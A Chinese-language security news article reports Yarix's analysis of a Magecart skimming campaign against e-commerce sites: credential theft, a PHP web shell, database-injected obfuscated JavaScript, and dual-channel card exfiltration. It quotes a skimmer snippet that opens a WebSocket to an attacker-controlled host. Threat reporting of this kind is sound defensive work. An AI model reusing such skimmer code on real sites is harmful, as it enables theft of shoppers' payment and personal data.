關鍵詞

網(wǎng)絡攻擊

一種復雜的 Magecart 攻擊活動已被發(fā)現(xiàn)，其目標指向電子商務平臺，攻擊者使用經(jīng)過高度混淆的 JavaScript 代碼來獲取敏感的支付信息。

這一最新的 Magecart 數(shù)據(jù)竊取攻擊變體展現(xiàn)出了先進的技術，既能在結賬過程中無縫獲取信用卡詳細信息，又能有效躲避檢測。

被注入到受攻擊的電子商務網(wǎng)站中的惡意代碼在后臺悄然運行，在毫無防備的客戶與攻擊者的命令控制服務器之間建立起了一座無形的橋梁。

此次攻擊遵循多階段入侵模式，一開始是未經(jīng)授權訪問網(wǎng)站的后端系統(tǒng)。

根據(jù)調查結果，攻擊者最初是通過盜取管理員憑證來實施攻擊的，這些憑證往往是通過部署在受害者系統(tǒng)上的信息竊取惡意軟件獲得的。

這些憑證為攻擊者提供了啟動攻擊序列所需的特權訪問權限，使他們能夠繞過標準的安全措施，并在目標基礎設施中站穩(wěn)腳跟。

Yarix 的研究人員在對受攻擊的電子商務平臺進行取證調查時發(fā)現(xiàn)了這一特定類型的 Magecart 攻擊。

他們的分析顯示，一旦攻擊者獲得了管理員訪問權限，他們會迅速上傳一個定制的 PHP 網(wǎng)頁后門程序，以保持持久訪問權限，這樣即使最初的入侵被發(fā)現(xiàn)，他們也能繼續(xù)控制服務器。

被發(fā)現(xiàn)的這個網(wǎng)頁后門在結構上與開源的 P.A.S. Fork v. 1.4 工具相似，但包含了針對此次攻擊活動的特定自定義修改內容。

這些攻擊的影響不僅僅局限于經(jīng)濟損失，還會對受影響的商家造成嚴重的聲譽損害，并削弱消費者的信任。

被盜取的數(shù)據(jù)通常包括完整的信用卡信息（卡號、有效期、安全碼）、個人信息（姓名、地址、電子郵件），而且往往還包括配送信息 —— 基本上為攻擊者提供了進行欺詐性交易或身份盜竊所需的一切信息。

攻擊的進展分為四個不同的階段：首先利用竊取的憑證進行后端訪問，然后安裝網(wǎng)頁后門程序以實現(xiàn)持續(xù)控制，接著通過注入混淆代碼來毒害數(shù)據(jù)庫，最后進入信用卡信息竊取階段，在此階段，客戶的支付信息會被獲取并泄露出去。

這種有條不紊的攻擊方式展示了這些威脅行為者所采用的復雜策略。

JavaScript 混淆與數(shù)據(jù)泄露技術

惡意的 JavaScript 代碼采用了復雜的混淆技術來躲避檢測。原始代碼看起來就像是一堆難以理解的十六進制值、變量賦值和函數(shù)調用的雜亂組合，而且沒有縮進格式。

一個名為 “chameleon” 的關鍵函數(shù)是混淆策略的核心，它在執(zhí)行過程中會動態(tài)地重新定義自身，并與立即調用函數(shù)表達式（IIFE）協(xié)同工作，進一步增加了代碼分析的難度。

createWebSocket=(randomString=genRandomString())=>{
if(Mp2mK1sl_Socket!==![] || localStorage[‘getItem’](‘XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf’)===null)
return![];
Mp2mK1sl_Socket=new WebSocket(‘wss://’+JSON[‘parse’](localStorage[‘getItem’](‘XsuHCYmfbgVSRFVx7SHRnU7DfapjFpaf’))[‘map’](function(_Oxe38f46) {
return String[‘fromCharCode’](_Oxe38f46);
})[‘join’](”)+’?token=’+randomString)}

數(shù)據(jù)泄露機制采用了兩種不同的渠道來確保數(shù)據(jù)成功被盜取。

主要方法是利用 WebSocket 與攻擊者控制的服務器進行實時通信，而次要技術則是利用 Image 對象創(chuàng)建包含已編碼信用卡數(shù)據(jù)的不可見請求。

這種創(chuàng)新的雙通道方法增加了攻擊者成功提取數(shù)據(jù)的機會，即使網(wǎng)絡監(jiān)控系統(tǒng)可能檢測并阻止了其中一種數(shù)據(jù)泄露方法，他們仍有可能通過另一種方法得逞。

安全圈

網(wǎng)羅圈內熱點 專注網(wǎng)絡安全

實時資訊一手掌握！

好看你就分享 有用就點個贊

支持「安全圈」就點個三連吧！